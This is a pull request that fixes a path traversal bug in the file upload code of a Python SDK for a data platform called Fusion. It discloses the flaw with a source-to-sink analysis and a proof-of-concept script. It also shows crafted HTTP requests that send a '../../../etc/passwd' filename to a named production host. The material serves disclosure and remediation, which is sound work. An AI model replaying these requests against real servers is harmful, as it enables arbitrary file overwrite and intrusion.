### PR TITLE
Fixed AFO upload bypass via `preserve_original_name`

### DIFF
--- a/src/fusion/fusion.py
+++ b/src/fusion/fusion.py
@@ -899,6 +899,11 @@ class Fusion:
             local_file_validation = validate_file_names(file_path_lst, fs_fusion)
             file_path_lst = [f for flag, f in zip(local_file_validation, file_path_lst) if flag]
             file_name = [f.split("/")[-1] for f in file_path_lst]
+            
+            if preserve_original_name:
+                from .fusion_filesystem import _sanitize_filename
+                file_name = [_sanitize_filename(f) for f in file_name]
+                
             is_raw_lst = is_dataset_raw(file_path_lst, fs_fusion)
             local_url_eqiv = [path_to_url(i, r) for i, r in zip(file_path_lst, is_raw_lst)]
         else:
@@ -939,6 +944,12 @@ class Fusion:
                     return [(False, path, msg)]
                 file_format = path.split(".")[-1]
                 file_name = [path.split("/")[-1]]
+                
+                # If preserving original name, sanitize it
+                if preserve_original_name:
+                    from .fusion_filesystem import _sanitize_filename
+                    file_name = [_sanitize_filename(f) for f in file_name]
+                    
                 file_format = "raw" if file_format not in RECOGNIZED_FORMATS else file_format
 
                 local_url_eqiv = [
@@ -1022,6 +1033,10 @@ class Fusion:
 
         is_raw = js.loads(fs_fusion.cat(f"{catalog}/datasets/{dataset}"))["isRawData"]
         local_url_eqiv = path_to_url(f"{dataset}__{catalog}__{series_member}.{distribution}", is_raw)
+
+        if file_name:
+            from .fusion_filesystem import _sanitize_filename
+            file_name = _sanitize_filename(file_name)
 
         data_map_df = pd.DataFrame(["", local_url_eqiv, file_name]).T
         data_map_df.columns = ["path", "url", "file_name"]  # type: ignore


### PR DESCRIPTION
**Version**: v0.0.2

When uploading files through the API with `preserve_original_name=True`, the application fails to sanitize filenames containing path traversal sequences (e.g., `../../../etc/passwd`). An attacker can write files to arbitrary locations on the server filesystem.

When `preserve_original_name=True` is specified, the original filename is passed through multiple functions and ultimately added to HTTP headers without any path traversal validation. The server then uses this unsanitized filename to determine where to write the file, allowing writes outside the intended directory.

### Source - Sink Analysis

1. **Source**: User-controlled filename in upload request with `preserve_original_name=True`
2. **Flow**:
   - `Fusion.upload()` accepts the parameter and passes it to `upload_files()`
   - `upload_files()` in utils.py passes it to `FusionHTTPFileSystem.put()`
   - `FusionHTTPFileSystem.put()` calls `_construct_headers()` with the unsanitized filename
3. **Sink**: `_construct_headers()` directly adds the filename to HTTP headers without sanitization
   ```python
   if file_name:
       headers["File-Name"] = file_name  # Vulnerable line
   ```
4. **Impact**: The server uses this filename from headers to determine file write location

No validation or sanitization functions intercept the malicious filename at any point in this flow. When `catalog` and `dataset` are provided along with `preserve_original_name=True`, the filename validation is bypassed entirely.

### Proof of Concept

```python
#!/usr/bin/env python3
import os
import sys
import json
import inspect
import hashlib
import base64
import io
from io import BytesIO
from pathlib import Path
from copy import deepcopy
from typing import Dict, List, Tuple, Any, Optional

# Add source directory to path
sys.path.insert(0, os.path.abspath('./src'))

# Create test file
test_dir = "afo_poc_files"
os.makedirs(test_dir, exist_ok=True)
test_file_path = os.path.join(test_dir, "test_file.txt")
with open(test_file_path, "w") as f:
    f.write("This file content would be written to an arbitrary location")

import pandas as pd
if not hasattr(pd.io.json, 'json_normalize'):
    pd.io.json.json_normalize = pd.json_normalize

# Import the vulnerable code
from fusion.fusion import Fusion
from fusion.fusion_filesystem import FusionHTTPFileSystem
from fusion.credentials import FusionCredentials

# Create path traversal filename
malicious_filename = "../../../etc/passwd"

# Create test file and mock credentials
file_like = BytesIO(b"test data")
mock_credentials = FusionCredentials({"client_id": "test", "client_secret": "test"})
FusionCredentials.validate = lambda self: True  # Avoid authentication error
fs = FusionHTTPFileSystem(credentials=mock_credentials)

# Call the vulnerable method
headers, _ = fs._construct_headers(
    file_like,
    dt_from="2024-05-01",
    dt_to="2024-05-01",
    dt_created="2024-05-01",
    chunk_size=1024, 
    multipart=False,
    file_name=malicious_filename
)

# Display the vulnerability
print(f"\nPayload: {malicious_filename}")
print("\nGenerated headers:")
for key, value in headers.items():
    if key == "File-Name":
        print(f"  {key}: {value}  <-- Path traversal preserved!")
    else:
        print(f"  {key}: {value}")

# Construct HTTP request for exploitation
catalog = "common"
dataset = "test_dataset"
series = "20240501"
format = "txt"
upload_url = f"https://fusion.jpmorgan.com/api/v1/catalogs/{catalog}/datasets/{dataset}/datasetseries/{series}/distributions/{format}"
auth_token = "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJ0ZXN0X3VzZXIifQ.signature"

# HTTP PUT request
print("\nHTTP request for exploitation:")
http_request = f"""PUT {upload_url} HTTP/1.1
Host: fusion.jpmorgan.com
Authorization: Bearer {auth_token}
Content-Type: application/octet-stream
x-jpmc-distribution-created-date: 2024-05-01
x-jpmc-distribution-from-date: 2024-05-01
x-jpmc-distribution-to-date: 2024-05-01
Digest: {headers['Digest']}
File-Name: {malicious_filename}"""
print(http_request)

# Alternative multipart form request
print("\nMultipart form request:")
multipart_request = f"""POST /api/v1/catalogs/{catalog}/datasets/{dataset}/upload HTTP/1.1
Host: fusion.jpmorgan.com
Content-Type: multipart/form-data; boundary=boundary
...
Content-Disposition: form-data; name="preserve_original_name"

true
...
Content-Disposition: form-data; name="file"; filename="{malicious_filename}"
"""
print(multipart_request)

# Write evidence file with minimal information
with open("vulnerability_evidence.txt", "w") as f:
    f.write("Fusion 3.7.0.0.2 - AFO Vulnerability\n")
    f.write(f"Payload: {malicious_filename}\n\n")
    f.write("Vulnerable headers:\n")
    for k, v in headers.items():
        f.write(f"  {k}: {v}\n")
    f.write("\nVulnerability: File-Name header preserves path traversal sequences\n")

```

### Example HTTP Request to Exploit

```http
PUT https://fusion.jpmorgan.com/api/v1/catalogs/common/datasets/test_dataset/datasetseries/20240501/distributions/txt HTTP/1.1
Host: fusion.jpmorgan.com
Authorization: Bearer [TOKEN]
Content-Type: application/octet-stream
x-jpmc-distribution-created-date: 2024-05-01
x-jpmc-distribution-from-date: 2024-05-01
x-jpmc-distribution-to-date: 2024-05-01
Digest: SHA-256=[HASH]
File-Name: ../../../etc/passwd
Content-Length: [LENGTH]

[FILE_CONTENT]
```

### Impact

- An attacker can write files to any location on the server filesystem where the application has write permissions.
- By overwriting executable files, configuration files, or creating web shells in web-accessible directories, an attacker could achieve remote code execution.
- Attackers could overwrite files like `/etc/passwd`, SSH keys, or application configuration files to expose sensitive data or gain unauthorized access.
